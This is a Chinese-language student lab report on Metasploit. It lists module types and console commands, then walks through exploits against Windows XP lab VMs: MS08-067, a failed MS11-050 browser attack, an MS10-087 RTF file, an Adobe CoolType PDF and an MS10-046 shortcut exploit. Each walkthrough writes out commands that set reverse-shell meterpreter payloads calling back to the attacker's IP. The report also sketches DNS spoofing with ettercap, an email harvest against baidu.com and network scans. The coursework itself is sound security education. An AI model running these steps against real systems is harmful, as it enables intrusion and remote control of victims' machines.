本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:html
一個主動攻擊實踐,如ms08-067; (1分)shell
一個針對瀏覽器的攻擊,如ms11-050;(1分)windows
一個針對客戶端的攻擊,如Adobe;(1分)api
成功應用任何一個輔助模塊。(0.5分)瀏覽器
以上四個小實踐可不限於以上示例,並要求至少有一個是和其餘全部同窗不同的,不然扣除0.5分。安全
Exploit
模塊
Payload
模塊
Encoder
模塊
payload
進行編碼,能夠經過多種編碼手段、屢次編碼方式有效的改變payload
代碼特徵payload
做用,但能對payload
進行加工Aux
模塊
Post
模塊
search name
:用指定關鍵字搜索能夠利用的漏洞模塊use exploit name
:使用漏洞show options
:顯示配置選項set option name option
:設置選項show payloads
:回鏈攻擊載荷show targets
顯示目標(os版本)set TARGET target number
:設置目標版本exploit
:開始漏洞攻擊sessions -l
:列出會話sessions -i id
:選擇會話sessions -k id
:結束會話Ctrl+z
:把會話放到後臺Ctrl+c
:結束會話show auxiliary
:顯示輔助模塊use auxiliary name
:使用輔助模塊set option name option
:設置選項exploit
:運行模塊exploit
,payload
,encode
。
exploit
:測試者利用系統,程序,或服務的漏洞進行攻擊的一個過程。payload
:攻擊者在目標系統上執行的一段攻擊代碼,該代碼具備返彈鏈接,建立用戶,執行其餘系統命令的功能。encode
:encode
編碼一是爲了不使攻擊載荷不能完整運行的「壞字符」,二是爲了改變特徵碼,幫助攻擊載荷避免被殺軟發現。返回目錄ruby
①攻擊機:kali ②靶機:windows XP SP3(English)服務器
在攻擊機kali輸入msfconsole
進入控制檯,依次輸入如下指令:網絡
use exploit/windows/smb/ms08_067_netapi
show payloads
set payload generic/shell_reverse_tcp
//tcp反向回連set LHOST 192.168.130.130
//攻擊機ipset LPORT 5303
//攻擊端口set RHOST 192.168.130.133
//靶機ip,特定漏洞端口已經固定set target 0
//自動選擇目標系統類型,匹配度較高exploit
//攻擊創建會話,攻擊成功結果以下:session
①攻擊機:kali ②靶機:WindowsXP Professional sp2/Windows7專業版 ③IE版本:7.0/8.0
在攻擊機kali輸入msfconsole
進入控制檯,依次輸入如下指令:
use windows/browser/ms11_050_mshtml_cobjectelement
set payload windows/meterpreter/reverse_http
//http反向回連set LHOST 192.168.130.130
//攻擊機ipset LPORT 5303
//攻擊端口固定set URIPATH 2015dwj
//統一資源標識符路徑設置exploit
在瀏覽器輸入http://192.168.130.130:8080/2015dwj
,IE出現彈窗,警告遇到問題需關閉程序:
此時攻擊機正在嘗試創建會話,但靶機已經禁止訪問了該網頁。失敗。
第二次在IE中訪問特定URI,此次回車剛一敲下去,連界面都尚未彈出來,又被kill了:
嚴肅地思考:是否是瀏覽器或者靶機系統的問題?看看還有哪些系統或軟件會存在這個漏洞吧:
因而嘗試了winXP/win7和IE7.0/IE8.0等等排列組合,費盡周折配置好了幾種環境,但是仍是失敗了。
去網上搜各類『ie已經爲了幫助保護您的計算機而關閉此網頁-百度經驗』、『使用ie8 提示Internet Explorer 已經爲了幫助保護您的計算機而關閉此網頁,怎麼解決』、『Win7系統下IE瀏覽器提示「IE爲了保護計算機而關閉網頁」的問題分析及解決方法』等等等等解決方案,根據前人的經驗教訓總結出了:應該修改Internet的安全設置!
在IE瀏覽器打開「工具->Internet選項」,選擇「安全」選項卡,將設置裏面最不安全的所有選上,自定義也設置爲最低等級——「中」:
除此以外,選擇「高級」選項卡,選中「容許運行或安裝軟件,即便籤名無效」:
總之,想盡一切方法下降IE瀏覽器的警戒性,讓它老老實實地中咱們的圈套!
但是仍是失敗了..且緣由至今未知(ಥ_ಥ)
①攻擊機:kali ②靶機:windowsXP Professional sp2 ③Office版本:2003
在攻擊機kali輸入msfconsole
進入控制檯,依次輸入如下指令:
use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
set payload windows/exec
//運行一個可執行文件set CMD calc.exe
//綁定計算器程序,進行啓動exploit
//攻擊使用show options
命令查看一些參數值,好比文件名、綁定程序等等。此時文件名爲默認,也能夠進行修改。
將生成的文件從/root/.msf4/local/msf.rft
拷貝到靶機上,並使用Office2003打開。無論第幾回打開,都會提示錯誤:
雙擊運行的同時,因爲綁定到計算器,所以打開了計算器程序,攻擊成功:
①攻擊機:kali ②靶機:windowsXP Professional sp2 ③Adobe版本:9.3
在攻擊機kali輸入msfconsole
進入控制檯,依次輸入如下指令:
use windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
//tcp反向回連set LHOST 192.168.130.130
//攻擊機ipset LPORT 5303
//攻擊端口set FILENAME 20155303-2.pdf
//設置生成pdf文件的名字exploit
//攻擊生成的pdf以下圖所示:
將生成的pdf文件拷貝到靶機上。
在kali上輸入back退出當前模塊,進入監聽模塊,輸入如下命令:
use exploit/multi/handler
//進入監聽模塊set payload windows/meterpreter/reverse_tcp
//tcp反向鏈接set LHOST 192.168.130.130
//攻擊機ipset LPORT 5303
//攻擊端口固定exploit
在靶機上打開20155303-2.pdf
文件:
攻擊機顯示攻擊成功:
此時若關閉pdf文件,則失去權限,攻擊失敗:
①攻擊機:kali ②靶機:windowsXP Professional sp2
在攻擊機kali輸入msfconsole
進入控制檯,依次輸入如下指令:
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
set SRVHOST 192.168.130.130
//攻擊機ipset payload windows/meterpreter/reverse_tcp
//tcp反向回連set LHOST 192.168.130.130
//攻擊機ipexploit
//攻擊這樣一來,靶機只要在瀏覽器訪問192.168.130.130:80
,就中了攻擊者的圈套:
點擊「容許」,會彈出一個攻擊者IP的目錄,其中有一個「快捷方式」的圖標:
此時攻擊機正在悄悄地鏈接靶機,試圖創建會話:
靶機雙擊快捷方式,攻擊機方顯示成功創建會話。使用sessions -i 1
選擇會話:
嘗試輸入shell
命令,攻擊成功:
若是靶機關閉網頁,攻擊機仍可控制並攻擊靶機:
一點小小的思考:讓靶機輸入攻擊機的IP地址仍是有很大的侷限性。若是能將DNS欺騙與之相結合,那攻擊就會更加主動。在這裏能夠用
ettercap
,修改etter.dns
配置文件爲*.cn A 192.168.130.130
。這樣一來,只要受害者訪問*.cn域名的時候,就會強行被欺騙成192.168.130.130:80
,從而就更加容易達到攻擊者的目的啦~
use auxiliary/scanner/portscan/syn
(使用portscan模塊)show options
set RHOSTS 192.168.130.130
(目標)set THREADS 50
(線程)exploit
use auxiliary/scanner/ssh/ssh_version
(使用ssh_version模塊)show options
(查看選項)set RHOSTS 10.107.100.0/24
(目標網段)set THREADS 50
(線程)exploit
(開始)use auxiliary/scanner/telnet/telnet_version
(使用telnet_version模塊)show options
(查看選項)set RHOSTS
10.180.100.0/24(目標網段)set THREADS 50
(線程)exploit
(開始)use auxiliary/gather/search_email_collector
(使用search_email_collector模塊)show options
(查看選項)set DOMAIN baidu.com
(掃描目標)exploit
(開始)use auxiliary/scanner/discovery/arp_sweep
(使用discovery/arp_sweep模塊)show options
(查看選項)set RHOSTS 10.180.100.0/24
(目標網段)set THREADS 50
(線程)exploit
(開始)如下爲對所在局域網進行掃描後的結果: